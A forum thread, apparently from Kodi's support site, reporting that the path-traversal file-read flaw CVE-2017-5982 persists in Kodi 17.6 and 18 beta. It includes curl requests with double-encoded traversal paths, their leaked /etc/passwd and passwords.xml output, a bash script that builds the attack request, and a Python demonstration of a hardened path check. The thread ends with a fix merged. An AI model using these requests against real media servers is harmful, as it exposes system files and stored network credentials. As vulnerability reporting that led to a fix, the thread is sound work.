Local File Include (CVE-2017-5982) is back
#1
I believe the Local File Include (CVE-2017-5982) is back.

I know that `bool CFileUtils::ZebraListAccessCheck(const std::string &filePath)` from xbmc/xbmc/utils/FileUtils.cpp is supposed to block access, but it doesn't.

The code from: 
https://www.exploit-db.com/exploits/41312/

Still works on:
NOTICE: Starting Kodi (17.6). Platform: Linux ARM (Thumb) 32-bit
NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
Kodi compiled Jun  7 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)


http://pi/image/image%3A%2F%2F%2e%2e%252...swords.xml
<passwords>
    <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://username:password@smb/media/</to>
    </path>
</passwords>
#2
Can you test a Kodi 18 nightly build? There have been no changes to Kodi 17 for many months.
#3
I will test tonight.
#4
You can grab a nightly here: https://discourse.osmc.tv/t/testing-kodi...y-pi/20631 if you wish to test with OSMC still for consistency.
#5
On OSMC it still exists:
22:31:01.228 T:1918357504  NOTICE: Starting Kodi (18.0-BETA3). Platform: Linux ARM (Thumb) 32-bit
22:31:01.229 T:1918357504  NOTICE: Using Release Kodi x32 build (version for Raspberry Pi)
22:31:01.229 T:1918357504  NOTICE: Kodi compiled Sep 20 2018 by GCC 6.3.0 for Linux ARM (Thumb) 32-bit version 4.9.30 (264478)

curl http://kodi/image/image%3A%2F%2F%2e%2e%2...252fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/bin/false
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
ntp:x:105:107::/home/ntp:/bin/false
messagebus:x:106:108::/var/run/dbus:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
avahi:x:108:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
osmc:x:1000:1000::/home/osmc:/bin/bash
#6
I did a test on a "plain" Kodi 18.0-BETA3 Git:2018921-a2133e4 running on Ubuntu 18.04.1 LTS (kernel: Linux 4.15.0-34-generic) and did not see the vulnerability.

curl http://kodi:8080/image/image%3A%2F%2F%2e...252fpasswd
<html><head><title>File not found</title></head><body>File not found</body></html>

Unless it was fixed between 18.0-BETA3 compiled Sep 20 2018 and 18.0-BETA3 Git:2018921-a2133e4, I will check with OSMC to see what they are adding that is causing the vulnerability to be seen.
#7
We haven't got any patches here that should introduce this vulnerability.
Try with a file in the Ubuntu user's home folder, as /etc/passwd may simply be inaccessible if running as an unprivileged user.
#8
@Sam.Nazarko 

The bigger issue is this one:

curl http://kodi/image/image%3A%2F%2F%2e%2e%2...swords.xml
<passwords>
    <path>
        <from pathversion="1">smb://smb/media</from>
        <to pathversion="1">smb://smbuser:password@smb/media/Pictures/</to>
    </path>
</passwords>


I replaced my server name with "smb", the user with "smbuser", and the password with "password" because I'm not posting those on the site :)
#9
This issue has never been fixed to my knowledge, and affects all platforms and not just OSMC.

Ubuntu with latest Kodi 18 *is* vulnerable.

Test script ("kvuln"):

```bash
#!/bin/bash

HOST="$1"
XPATH="$2"
XPATH="${XPATH//\//%2F}"   # encode every "/" as %2F
XPATH="${XPATH//%/%25}"    # encode the "%" again, so %2F becomes %252F
# BASE is not assigned anywhere in the script, so it expands to an empty string

curl -s "http://${HOST}/image/image%3A%2F%2F..${BASE}${XPATH}"
```

Session:

```text
neil@nm-linux:~/projects$ uname -a
Linux nm-linux 4.13.0-46-generic #51-Ubuntu SMP Tue Jun 12 12:36:29 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
neil@nm-linux:~/projects$ /freenas/data/kvuln localhost:8080 /../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
```

special://envhome is /home/neil, and paths to be exploited are relative to that root.

An attempt to fix CVE-2017-5982 was proposed but never implemented: https://github.com/xbmc/xbmc/pull/11851

If anything else in this area has been implemented (can't find anything) then it is now a regression.

I'll move this thread to OS Independent/Other.
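The test script above encodes the path separators twice (each `/` becomes `%2F`, then `%252F`), and the post notes that paths are resolved relative to special://envhome. As an added illustration (not Kodi's code, not `ZebraListAccessCheck`, and not the fix in the linked pull requests), the Python below contrasts a containment check that percent-decodes once and looks for `..` components, which the double-encoded shape slips past, with one that decodes to a fixed point, resolves the result against the base directory and then tests containment. The root `/home/neil` is the special://envhome value from the post; the request strings are constructed for the demonstration.

```python
"""Containment check for percent-encoded image:// requests (added example)."""
import posixpath
from urllib.parse import unquote

SCHEME = "image://"
MAX_DECODE_ROUNDS = 4  # bound on how much nested percent-encoding we unwrap


def fully_decode(value: str, max_rounds: int = MAX_DECODE_ROUNDS) -> str:
    """Percent-decode until the result stops changing, or give up.

    One unquote() turns %252F into %2F, not into "/", so a check that decodes
    once and then splits on "/" never sees the traversal components.
    """
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("percent-encoding nested deeper than %d rounds" % max_rounds)


def naive_is_allowed(raw_request: str) -> bool:
    """Weak check: decode once, split on "/", reject only an exact ".." part."""
    decoded = unquote(raw_request)
    if not decoded.startswith(SCHEME):
        return False
    rel = decoded[len(SCHEME):]
    return ".." not in rel.split("/")


def contained_path(raw_request: str, root: str):
    """Hardened check: decode fully, resolve against root, verify containment.

    Returns the normalised absolute path when it lies under root, else None.
    """
    try:
        decoded = fully_decode(raw_request)
    except ValueError:
        return None  # refuse anything we cannot decode within the bound
    if not decoded.startswith(SCHEME):
        return None
    rel = decoded[len(SCHEME):]
    root = posixpath.normpath(root)
    prefix = root if root.endswith("/") else root + "/"
    # posixpath.join drops root when rel is absolute, so an absolute rel
    # resolves outside root and fails the prefix test below.
    resolved = posixpath.normpath(posixpath.join(root, rel))
    if resolved == root or resolved.startswith(prefix):
        return resolved
    return None


if __name__ == "__main__":
    ROOT = "/home/neil"  # special://envhome as reported in the thread
    # Constructed inputs: the double-encoded traversal shape produced by the
    # test script above, and a legitimate relative request.
    traversal = "image%3A%2F%2F..%252F..%252F..%252Fetc%252Fpasswd"
    legit = "image%3A%2F%2FPictures%2Fcat.jpg"
    print("naive allows traversal:", naive_is_allowed(traversal))  # True
    print("hardened traversal:", contained_path(traversal, ROOT))  # None
    print("hardened legit:", contained_path(legit, ROOT))  # /home/neil/Pictures/cat.jpg
```

The decisive difference is the order of operations: the hardened version finishes decoding before it interprets any separators, and it decides on the normalised absolute path rather than on the presence or absence of a `..` token in the raw request.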
#10
Fix is underway

https://github.com/xbmc/xbmc/pull/14501
#11
FYI: Fix merged